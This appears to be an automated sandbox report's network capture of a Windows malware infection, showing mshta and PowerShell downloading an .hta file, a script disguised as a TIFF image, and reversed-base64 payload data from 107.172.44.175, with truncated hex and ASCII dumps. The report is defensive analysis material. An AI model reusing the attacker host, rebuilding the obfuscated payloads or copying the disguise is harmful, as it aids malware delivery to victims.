                                                            Nov 26, 2024 15:49:02.096585035 CET1236INData Raw: 35 32 35 32 35 34 33 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 36 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35
                                                            Data Ascii: 5252543%25252525%25252532%25252535%25252536%25252532%25252525%25252532%25252535%25252536%25252546%25252525%25252532%25252535%25252536%25252534%25252525%25252532%25252535%25252537%25252539%25252525%25252532%25252535%25252533%25252545%25252525%2
                                                            Nov 26, 2024 15:49:02.097279072 CET776INData Raw: 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 36 25 32 35 32 35 32 35 33 33 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32
                                                            Data Ascii: 2532%25252535%25252536%25252533%25252525%25252532%25252535%25252535%25252532%25252525%25252532%25252535%25252536%25252539%25252525%25252532%25252535%25252537%25252530%25252525%25252532%25252535%25252537%25252534%25252525%25252532%25252535%2525
                                                            Nov 26, 2024 15:49:02.097295046 CET1236INData Raw: 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33
                                                            Data Ascii: 35%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%252525
                                                            Nov 26, 2024 15:49:02.097309113 CET1236INData Raw: 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32
                                                            Data Ascii: 25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%
                                                            Nov 26, 2024 15:49:02.097322941 CET1236INData Raw: 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35
                                                            Data Ascii: 52535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%252
                                                            Nov 26, 2024 15:49:02.216317892 CET1236INData Raw: 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33
                                                            Data Ascii: 39%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%252525


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.2249166107.172.44.175803648C:\Windows\System32\mshta.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 26, 2024 15:49:06.028186083 CET489OUTGET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Range: bytes=8894-
                                                            Connection: Keep-Alive
                                                            Host: 107.172.44.175
                                                            If-Range: "10deaf-627cc9922fce5"
                                                            Nov 26, 2024 15:49:07.144638062 CET1236INHTTP/1.1 206 Partial Content
                                                            Date: Tue, 26 Nov 2024 14:49:06 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Tue, 26 Nov 2024 08:25:56 GMT
                                                            ETag: "10deaf-627cc9922fce5"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1096689
                                                            Content-Range: bytes 8894-1105582/1105583
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/hta
                                                            Data Raw: 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 [TRUNCATED]
                                                            Data Ascii: 2532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%2525253
                                                            Nov 26, 2024 15:49:07.144794941 CET1236INData Raw: 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35
                                                            Data Ascii: 2%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%2525253
                                                            Nov 26, 2024 15:49:07.144809008 CET1236INData Raw: 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35
                                                            Data Ascii: 5252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%2
                                                            Nov 26, 2024 15:49:07.145272970 CET1236INData Raw: 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32
                                                            Data Ascii: 2532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%2525
                                                            Nov 26, 2024 15:49:07.145574093 CET1236INData Raw: 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35
                                                            Data Ascii: 0%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%2525252
                                                            Nov 26, 2024 15:49:07.145586014 CET1236INData Raw: 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35
                                                            Data Ascii: 5252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%2
                                                            Nov 26, 2024 15:49:07.146167040 CET776INData Raw: 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32
                                                            Data Ascii: 2530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%2525
                                                            Nov 26, 2024 15:49:07.146217108 CET1236INData Raw: 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33
                                                            Data Ascii: 39%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%252525
                                                            Nov 26, 2024 15:49:07.146229029 CET1236INData Raw: 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32
                                                            Data Ascii: 25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%
                                                            Nov 26, 2024 15:49:07.147032022 CET1236INData Raw: 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35
                                                            Data Ascii: 52539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%252
                                                            Nov 26, 2024 15:49:07.265093088 CET1236INData Raw: 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 30 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32
                                                            Data Ascii: 32%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%25252530%25252539%25252525%25252532%25252535%252525


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.2249167107.172.44.175803784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 26, 2024 15:49:15.109826088 CET389OUTGET /1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF HTTP/1.1
                                                            Accept: */*
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 107.172.44.175
                                                            Connection: Keep-Alive
                                                            Nov 26, 2024 15:49:16.286005020 CET1236INHTTP/1.1 200 OK
                                                            Date: Tue, 26 Nov 2024 14:49:15 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Tue, 26 Nov 2024 08:11:02 GMT
                                                            ETag: "288da-627cc63e3edba"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 166106
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: image/tiff
                                                            Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 72 00 69 00 7a 00 53 00 4b 00 6d 00 62 00 63 00 55 00 55 00 47 00 69 00 4b 00 74 00 64 00 20 00 3d 00 20 00 22 00 47 00 47 00 42 00 43 00 55 00 68 00 6b 00 47 00 6c 00 74 00 47 00 62 00 64 00 4b 00 6f 00 22 00 0d 00 0a 00 6d 00 4c 00 74 00 47 00 71 00 4c 00 70 00 67 00 4e 00 7a 00 64 00 6d 00 78 00 6f 00 4e 00 20 00 3d 00 20 00 22 00 63 00 75 00 4c 00 65 00 74 00 74 00 52 00 57 00 51 00 4c 00 63 00 50 00 41 00 41 00 64 00 22 00 0d 00 0a 00 48 00 63 00 70 00 63 00 4c 00 52 00 6d 00 4b 00 41 00 4c 00 66 00 4c 00 57 00 51 00 5a 00 20 00 3d 00 20 00 22 00 4b 00 4f 00 6c 00 62 00 55 00 66 00 68 00 4c 00 61 00 4b 00 74 00 4f 00 41 00 6b 00 69 00 22 00 0d 00 0a 00 6d 00 78 00 7a 00 65 00 78 00 63 00 62 00 5a 00 41 00 6b 00 66 00 57 00 50 00 41 00 74 00 20 00 3d 00 20 00 22 00 48 00 4f 00 55 00 6b 00 74 00 4c 00 50 00 4c 00 47 00 41 00 4b 00 64 00 50 00 62 00 63 00 22 00 0d 00 0a 00 5a 00 70 00 7a 00 63 00 70 00 70 00 4c 00 5a 00 7a 00 4c 00 63 00 57 00 64 00 70 00 74 00 20 00 [TRUNCATED]
                                                            Data Ascii: rizSKmbcUUGiKtd = "GGBCUhkGltGbdKo"mLtGqLpgNzdmxoN = "cuLettRWQLcPAAd"HcpcLRmKALfLWQZ = "KOlbUfhLaKtOAki"mxzexcbZAkfWPAt = "HOUktLPLGAKdPbc"ZpzcppLZzLcWdpt = "gfxLGLARAWUWiaW"LLoLOoogPJNWGhL = "BUWiGWWGkLNuWGN"WeWLILtzkiWeZWK = "xUiKIcGoNniWWqf"LhKWNCBRdOaeLeL = "WiaWiKzdzBdBpPi"PGpuKkSfmNAoWLh = "RAfLrpHcmkLWsWU"uKjrzoWnOaWmGWC = "kKPIlRCAcGLWLha"ccoLmUeNcfBfWvo = "rPcTNPciPoLNhqk"uULBgcaOisfpLKL = "xgWnLkbZfURGOWc"qBscQziR
                                                            Nov 26, 2024 15:49:16.286130905 CET1236INData Raw: 00 63 00 6f 00 4c 00 69 00 6a 00 4c 00 64 00 20 00 3d 00 20 00 22 00 57 00 57 00 74 00 57 00 4c 00 49 00 70 00 57 00 63 00 6f 00 4f 00 50 00 47 00 69 00 47 00 22 00 0d 00 0a 00 51 00 4c 00 72 00 62 00 4c 00 4b 00 72 00 48 00 4c 00 4c 00 6d 00 4c
                                                            Data Ascii: coLijLd = "WWtWLIpWcoOPGiG"QLrbLKrHLLmLLfL = "xQrGZWUktemjZfA"GTfukcfLZpLecsW = "BWxcHcinAiGhhNb"xOAAagkLLxaCiKs =
                                                            Nov 26, 2024 15:49:16.286144018 CET1236INData Raw: 00 4c 00 64 00 4c 00 48 00 55 00 6a 00 62 00 47 00 71 00 72 00 57 00 61 00 4e 00 22 00 0d 00 0a 00 64 00 75 00 6f 00 4b 00 69 00 48 00 41 00 67 00 43 00 47 00 75 00 4c 00 51 00 74 00 52 00 20 00 3d 00 20 00 22 00 43 00 62 00 57 00 57 00 4c 00 63
                                                            Data Ascii: LdLHUjbGqrWaN"duoKiHAgCGuLQtR = "CbWWLcspigLmmpC"CudGANZRrGhdLlU = "eeghPepuULZLPKu"OjhBzoGrRLKmxrL = "bTcfWUdRzm
                                                            Nov 26, 2024 15:49:16.286673069 CET1236INData Raw: 00 64 00 4c 00 22 00 0d 00 0a 00 4e 00 61 00 57 00 50 00 4c 00 71 00 48 00 72 00 51 00 4c 00 57 00 4c 00 63 00 57 00 64 00 20 00 3d 00 20 00 22 00 66 00 70 00 47 00 6e 00 4b 00 52 00 4b 00 73 00 55 00 4c 00 57 00 4c 00 4f 00 6d 00 76 00 22 00 0d
                                                            Data Ascii: dL"NaWPLqHrQLWLcWd = "fpGnKRKsULWLOmv"coiUUCIapmiBcAW = "kahmUULoWAqAhRK"flzkWjBTcKqxtLL = "KWWatzZOiWacfPc"WaNqB
                                                            Nov 26, 2024 15:49:16.286684036 CET1236INData Raw: 00 6f 00 52 00 4c 00 75 00 55 00 68 00 42 00 54 00 6d 00 20 00 3d 00 20 00 22 00 43 00 6d 00 68 00 57 00 4e 00 47 00 74 00 65 00 4f 00 55 00 76 00 57 00 50 00 65 00 65 00 22 00 0d 00 0a 00 63 00 57 00 66 00 42 00 4c 00 6c 00 57 00 6b 00 74 00 69
                                                            Data Ascii: oRLuUhBTm = "CmhWNGteOUvWPee"cWfBLlWktiPSkZG = "HpiWWTatnLNWZLc"bkGpuiUPRAcOdGK = "tbRsgKepGhKqOPZ"WmeAcLKcsnToLRp
                                                            Nov 26, 2024 15:49:16.286695004 CET1236INData Raw: 00 4a 00 57 00 6e 00 6c 00 22 00 0d 00 0a 00 4b 00 47 00 50 00 72 00 55 00 41 00 47 00 53 00 52 00 4b 00 69 00 69 00 76 00 71 00 41 00 20 00 3d 00 20 00 22 00 41 00 67 00 5a 00 70 00 65 00 72 00 69 00 63 00 68 00 6f 00 6e 00 64 00 72 00 69 00 74
                                                            Data Ascii: JWnl"KGPrUAGSRKiivqA = "AgZperichondriteKpLGiKfJiz"bhoqaaKoOLJLims = "jiLpWhCgAZiWcGb"QUqozbKCNcKkLeN = "aURbxZLU
                                                            Nov 26, 2024 15:49:16.287606955 CET1236INData Raw: 00 6b 00 69 00 7a 00 57 00 6e 00 63 00 4c 00 55 00 57 00 63 00 4b 00 20 00 3d 00 20 00 22 00 71 00 71 00 64 00 47 00 47 00 5a 00 76 00 6b 00 50 00 6b 00 6b 00 6f 00 4e 00 63 00 50 00 22 00 0d 00 0a 00 4b 00 57 00 74 00 53 00 55 00 78 00 6f 00 4b
                                                            Data Ascii: kizWncLUWcK = "qqdGGZvkPkkoNcP"KWtSUxoKKGAIOOi = "pkuhiUklOLHUhlN"iUjLWLWflUiNgrt = "atLbvPLLLWqsPnL"ZNzGgCAWGGLikA
                                                            Nov 26, 2024 15:49:16.287623882 CET1236INData Raw: 00 4a 00 4c 00 76 00 6f 00 69 00 4e 00 63 00 48 00 22 00 0d 00 0a 00 64 00 50 00 6f 00 71 00 57 00 61 00 6b 00 65 00 4b 00 69 00 57 00 4b 00 53 00 4b 00 6f 00 20 00 3d 00 20 00 22 00 66 00 55 00 55 00 7a 00 43 00 47 00 41 00 41 00 4c 00 71 00 6a
                                                            Data Ascii: JLvoiNcH"dPoqWakeKiWKSKo = "fUUzCGAALqjAKnU"ipUNKLzLHfWNqkR = "UmUmkAoWHWfxWOn"ZRdoahWbbciHAic = "IsjLhqbUWaKWOLR"
                                                            Nov 26, 2024 15:49:16.287635088 CET1236INData Raw: 00 66 00 65 00 69 00 78 00 4a 00 6f 00 4b 00 63 00 4f 00 57 00 6f 00 57 00 64 00 20 00 3d 00 20 00 22 00 7a 00 43 00 6c 00 70 00 70 00 6c 00 78 00 55 00 65 00 4f 00 64 00 4b 00 66 00 65 00 66 00 22 00 0d 00 0a 00 6b 00 50 00 61 00 6b 00 6c 00 65
                                                            Data Ascii: feixJoKcOWoWd = "zClpplxUeOdKfef"kPakleBKcBfbnpU = "soBLzkakLWcteLZ"uCtGNmWzJRPGmLG = "ULbigxhcpfIdGeU"zoiNgzUKRi
                                                            Nov 26, 2024 15:49:16.288494110 CET1236INData Raw: 00 75 00 4c 00 41 00 69 00 64 00 57 00 53 00 63 00 51 00 4f 00 22 00 0d 00 0a 00 4c 00 76 00 49 00 75 00 47 00 4b 00 4b 00 4c 00 78 00 6e 00 69 00 69 00 6e 00 5a 00 4c 00 20 00 3d 00 20 00 22 00 4f 00 4c 00 63 00 55 00 4b 00 6f 00 7a 00 5a 00 65
                                                            Data Ascii: uLAidWScQO"LvIuGKKLxniinZL = "OLcUKozZexLGiUi"iKKppcHmNmoAiKl = "WWeUedQPkpiLILU"UzLpWWoLxZZWxxN = "kpaxLLcoiLUKkLB
                                                            Nov 26, 2024 15:49:16.406301022 CET1236INData Raw: 00 0d 00 0a 00 75 00 4e 00 76 00 74 00 55 00 57 00 4b 00 6f 00 63 00 73 00 6f 00 63 00 4b 00 69 00 47 00 20 00 3d 00 20 00 22 00 55 00 6c 00 68 00 43 00 5a 00 61 00 53 00 62 00 62 00 69 00 6e 00 4c 00 47 00 68 00 73 00 22 00 0d 00 0a 00 41 00 57
                                                            Data Ascii: uNvtUWKocsocKiG = "UlhCZaSbbinLGhs"AWShaGJkLNWNCUW = "tpzGOeCaGJebpLC"prLmozRdLGzLLKP = "NWqhkuUUPniLWro"CLuLmjbZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.2249169107.172.44.17580924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 26, 2024 15:49:40.982269049 CET78OUTGET /1321/CAMRM.txt HTTP/1.1
                                                            Host: 107.172.44.175
                                                            Connection: Keep-Alive
                                                            Nov 26, 2024 15:49:42.186249971 CET1236INHTTP/1.1 200 OK
                                                            Date: Tue, 26 Nov 2024 14:49:41 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Tue, 26 Nov 2024 08:08:44 GMT
                                                            ETag: "1eaac-627cc5b9be702"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 125612
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/plain
                                                            Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2b 6b 48 62 69 31 57 5a 7a 4e 58 59 76 77 6a 43 4e 34 7a 62 6d 35 57 53 30 4e 58 64 79 52 33 4c 38 41 43 49 4b 30 67 50 35 52 58 61 79 56 33 59 6c 4e 33 4c 38 41 43 49 67 41 69 43 4e 34 7a 63 6c 64 57 5a 73 6c 6d 64 70 4a 48 55 6b 56 47 64 7a 56 57 64 78 56 6d 63 76 77 44 49 67 41 43 49 67 41 69 43 4e 34 7a 4c 69 55 32 63 73 46 6d 5a 69 30 7a 63 7a 56 32 59 6a 46 55 61 31 42 69 49 79 56 32 61 76 5a 6e 62 4a 4e 58 59 69 30 44 62 6c 5a 58 5a 73 42 43 62 6c 5a 58 5a 4d 35 32 62 70 52 58 64 6a 56 47 65 46 52 57 5a 30 4e 58 5a 31 46 58 5a 79 78 44 49 67 41 43 49 67 41 43 49 67 6f 51 44 2b 49 79 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 [TRUNCATED]
                                                            Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+kHbi1WZzNXYvwjCN4zbm5WS0NXdyR3L8ACIK0gP5RXayV3YlN3L8ACIgAiCN4zcldWZslmdpJHUkVGdzVWdxVmcvwDIgACIgAiCN4zLiU2csFmZi0zczV2YjFUa1BiIyV2avZnbJNXYi0DblZXZsBCblZXZM52bpRXdjVGeFRWZ0NXZ1FXZyxDIgACIgACIgoQD+IyM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIzV2ZlxWa2lmcQRWZ0NXZ1FXZyxDIgACIgAiCN4Te0lmc1NWZzxDIgACIK0gPiIjdu02chpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4Bybm5WS0NXdyRHPgAiCN4zLiAHch5ibvlGdhNWasBHcBlXTi0TZtFmbgICMuAjLw4SMi0jbvl2cyVmdgkHdpRnblRWS5xmYtV2czFGPgAiCN4jIw4SMi0jbvl2cyVmV0NXZmlmbh1GIiEjdu02chpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BSesJWblN3chxjCNoQD+8jIzVWei0TZu9GbhRmbhR3cgICOtYEVVJSPn5Wak92YuVGIiAjLxISPu9WazJXZ2BCbth3P887uvDAAAADAuAAMA4CAwAgLAEDAAAgbA8GApBwcAIHAlBgVAACA5BAbAIGAtBQZAMHAzBQQAEAAIAAOAAAAwAgLAADAuAAMA4CAxAAAA4GAvBQaAMHAyBQZAYFA0BwYAUHAkBwbAIHAQBQAAgAA0AAAAAAAoBAWA0EACBQaAYGAZ
                                                            Nov 26, 2024 15:49:42.186388969 CET1236INData Raw: 42 67 51 41 45 45 41 52 42 41 41 41 41 41 41 6c 42 51 62 41 45 47 41 4f 42 41 64 41 4d 47 41 31 42 41 5a 41 38 47 41 79 42 41 55 41 45 41 41 4c 41 67 4e 41 41 41 41 41 41 51 5a 41 67 48 41 6c 42 67 4c 41 67 47 41 59 42 51 54 41 49 45 41 70 42 67
                                                            Data Ascii: BgQAEEARBAAAAAAlBQbAEGAOBAdAMGA1BAZA8GAyBAUAEAALAgNAAAAAAQZAgHAlBgLAgGAYBQTAIEApBgZAkFACBQQAEFAAAQZA0GAhBgbAUGAsBQaAYEAsBQYA4GApBwZAkGAyBwTAEAAPAgRAAAAAAAAAAAAzBwaAIHAhBQbAUGAkBQYAIHAUBAbAEGAnBQZAwEABAQAAoCAAAANAIDAwAgMAACAgAQqAACA0BAaAcGApBgc
                                                            Nov 26, 2024 15:49:42.186402082 CET1236INData Raw: 49 78 42 55 41 4a 67 53 45 67 43 46 6f 51 41 48 4d 51 47 53 67 52 41 43 4b 68 41 41 67 41 43 49 67 41 41 65 51 77 42 48 67 52 41 31 49 59 45 56 59 41 47 42 45 6d 45 56 55 41 68 41 4b 52 41 4b 55 67 44 41 34 52 41 42 41 6a 42 4f 34 67 44 64 49 41
